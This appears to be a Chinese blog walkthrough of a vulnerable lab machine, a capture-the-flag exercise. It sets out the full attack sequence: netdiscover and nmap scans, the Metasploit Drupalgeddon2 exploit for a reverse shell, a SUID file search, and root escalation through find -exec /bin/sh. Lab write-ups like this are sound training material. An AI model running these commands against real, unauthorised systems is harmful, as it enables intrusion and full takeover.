靶机准备

导入虚拟机设置网络为NAT

kali：192.168.164.137

扫描获得靶机ip：192.168.164.182

netdiscover -r 192.168.164.0/24

渗透测试

扫描端口

nmap -sS -sV -T5 -A -p- 192.168.164.182

开放如下端口



发现是Drupal应用



直接上metasploit里搜利用：

msfconsole

search drupal

use exploit/unix/webapp/drupal_drupalgeddon2

set rhosts 192.168.164.182

exploit

轻松拿到反弹shell



查看id，不是root权限



查找一下有哪些有root权限的程序

find / -perm -u=s -type f 2>/dev/null

找一个可读的文件吧，重新弹一个shell出来

/usr/bin/find /var/www/COPYRIGHT.txt -exec /bin/sh \;

已经是root权限了

找flag

最新文章

1. 解决 Springboot Unable to build Hibernate SessionFactory @Column命名不起作用
2. AgileEAS.NET SOA 中间件Web运行容器管理功能已全部开源，欢迎大家下载、使用、反馈
3. FreeMarker中文API手册(完整)
4. DevExpress gridControl 设置分组
5. 验证码的种类与实现 C#封装类 - .NET MVC WEBFORM
6. IoC实践--用Unity实现MVC5.0的IoC控制反转方法
7. EasyMock使用手记
8. Sass：一种CSS预处理器语言
9. JSP---演示ErroPage、isErroPage和jsp:forword标签
10. 基于visual Studio2013解决算法导论之024双向链表实现
11. Qt--自定义Model
12. 【转】Linux shell笔记
13. python并发编程之多进程(一)：进程开启方式&多进程
14. 27.C++- 智能指针
15. python websocket 客户端连接
16. ASP .NetCore 部署500错误 查看异常详情
17. OSI七层协议模型、TCP/IP四层模型和五层协议体系结构之间的关系
18. recovery&linux系统升级数据更新分析总结
19. jmeter的jtl日志转html报告常见报错笔记
20. vue中实现浏览器的复制功能

热门文章

1. C#项目版本号自定义位置自动向上增加小工具设计与实现
2. 关于git和SVN的介绍和区别
3. Solution -「ZJOI 2019」「洛谷 P5326」开关
4. JAVA8学习——从使用角度深入Stream流(学习过程)
5. [文档]运维故障报告template
6. jemter参数化是如何取值的？（数据分配）
7. windev中使用DateFile和Query作为表格数据源的一个重要区别
8. ElasticSearch学习笔记（详细）
9. -bash: ./1.sh: /bin/bash^M: bad interpreter: No such file or directory
10. 聊聊第一个开源项目（内网穿透） - CProxy